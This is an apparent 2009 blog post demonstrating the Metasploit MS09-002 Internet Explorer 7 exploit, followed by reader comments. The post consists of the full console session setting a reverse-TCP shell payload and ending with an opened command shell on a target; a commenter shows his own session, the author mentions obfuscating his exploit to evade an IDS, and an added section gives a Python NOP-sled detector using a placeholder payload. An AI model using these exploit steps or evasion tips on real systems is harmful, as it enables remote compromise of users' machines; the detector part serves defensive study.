Wednesday, February 18, 2009

MS09_002 Memory Corruption Exploit


Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)
dean de beer

6 comments:

Anonymous said...

Hmmmm... sounds great!! Can't wait for the juicy details ;)

Anonymous said...

Install Linux, problem solved.

Anonymous said...

got mine!

msf exploit(ms09_002) > sessions -l -v

Active sessions
===============

Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 172.10.1.100:1975 -> 172.10.1.104:1116 windows/browser/ms09_002

msf exploit(ms09_002) >

...thanks for the sample malware, Dean!!

dean de beer said...

No worries. Happy to help. :) I just need to finish off the obfuscation of the variables in mine and it's done.

I tested it through ISS's IDS and it's catching the shellcode and NOPs right now, and not the trigger itself, although that does not seem easy to alert on.
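Added example (mine, not part of Dean's post or of any comment above): a small Python scanner that does the part of the job the comment says the IDS is doing. It pulls the string literals passed to JavaScript unescape() out of a page, decodes the %uXXXX / %XX escapes into the little-endian UTF-16 bytes the string occupies in memory, and reports literals containing a long run of 0x90 NOP bytes. The HTML in it is constructed for this example and only imitates the general shape of %u-encoded JavaScript payloads used by browser exploits of that era; that shape is an assumption, it is not the ms09_002 module's output, and the "shellcode" bytes are placeholder bytes, not a working payload.

```python
import re

# Constructed sample page for this example. It imitates the shape of a %u-encoded
# JavaScript payload (NOP sled + shellcode, grown by string concatenation); it is
# NOT the real ms09_002 page and the "sc" bytes are a placeholder, not a payload.
SAMPLE_HTML = """<html><body><script>
var nops = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
var sc = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30");
while (nops.length < 0x40000) nops += nops;
var block = nops.substring(0, nops.length - sc.length) + sc;
</script></body></html>"""

# unescape("...") / unescape('...') calls; the captured quote (\1) ends the literal.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
# Tokens JavaScript's unescape() understands: %uXXXX (one UTF-16 code unit),
# %XX (one code unit), or a literal character (one code unit). Order matters.
ESCAPE_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)


def decode_js_unescape(literal):
    """Return the bytes a JS string built by unescape(literal) occupies in memory.

    Every UTF-16 code unit is emitted little-endian, which is how it lies in the
    browser heap and therefore what a NOP-sled or shellcode signature must match.
    """
    out = bytearray()
    for m in ESCAPE_TOKEN.finditer(literal):
        if m.group(1) is not None:
            unit = int(m.group(1), 16)
        elif m.group(2) is not None:
            unit = int(m.group(2), 16)
        else:
            unit = ord(m.group(3))
        out += bytes((unit & 0xFF, (unit >> 8) & 0xFF))
    return bytes(out)


def longest_run(data, value):
    """Length of the longest run of consecutive bytes equal to `value`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def find_nop_sleds(html, min_run=16, nop=0x90):
    """Decode each unescape() literal in `html` and report the ones containing a
    run of `nop` bytes at least `min_run` long, as (literal_index, run, decoded_len)."""
    findings = []
    for idx, m in enumerate(UNESCAPE_CALL.finditer(html)):
        data = decode_js_unescape(m.group(2))
        run = longest_run(data, nop)
        if run >= min_run:
            findings.append((idx, run, len(data)))
    return findings


if __name__ == "__main__":
    for idx, run, total in find_nop_sleds(SAMPLE_HTML):
        print(f"unescape() literal #{idx}: {run}-byte NOP run in {total} decoded bytes")
```

Two things the sample makes visible. Renaming the JavaScript variables, the obfuscation the comment mentions, leaves the decoded %u9090 run untouched, which is why the sled and the shellcode are the easy signatures; the trigger has no comparable long constant to key on, which matches the observation that it is hard to alert on. And the sled on the wire can be short (the sample sends only 16 NOP bytes and doubles them at runtime), so `min_run` has to be tuned per deployment rather than set to "anything long".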

CG said...

w00t!

Anonymous said...

w00t! I didn't get mine! :(